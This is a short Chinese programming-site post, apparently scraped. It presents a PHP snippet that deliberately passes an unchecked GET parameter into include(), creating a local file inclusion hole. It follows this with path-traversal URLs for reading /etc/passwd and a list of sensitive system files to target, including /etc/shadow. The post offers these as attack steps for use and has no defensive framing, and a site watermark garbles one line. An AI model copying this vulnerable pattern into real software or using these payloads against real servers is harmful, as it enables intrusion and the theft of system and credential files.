php 伪造本地文件包含漏洞的代码

php 搞代码 4年前 (2022-01-23) 18次浏览已收录 0个评论

代码如下:
<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=…./../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow（、本文来源gao@!dai!ma.com搞$$代^@码网*搞gaodaima代码
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

搞代码网（gaodaima.com）提供的所有资源部分来自互联网，如果有侵犯您的版权或其他权益，请说明详细缘由并提供版权或权益证明然后发送到邮箱[email protected]‍，我们会在看到邮件的第一时间内为您处理，或直接联系QQ：872152909。本网站采用BY-NC-SA协议进行授权
转载请注明原文链接：php 伪造本地文件包含漏洞的代码

版权声明
本站的文章和资源来自互联网或者站长
的原创，按照 CC BY -NC -SA 3.0 CN
协议发布和共享，转载或引用本站文章
应遵循相同协议。如果有侵犯版权的资
源请尽快联系站长，我们会在24h内删
除有争议的资源。
网站驱动
- 部署在阿里云
- 由七牛云储存提供 CDN 加速
友情链接
- 搞代码
- 宝塔镇河妖
强烈推荐
- 腾讯云
- 二三四五

Hi，您需要填写昵称和邮箱！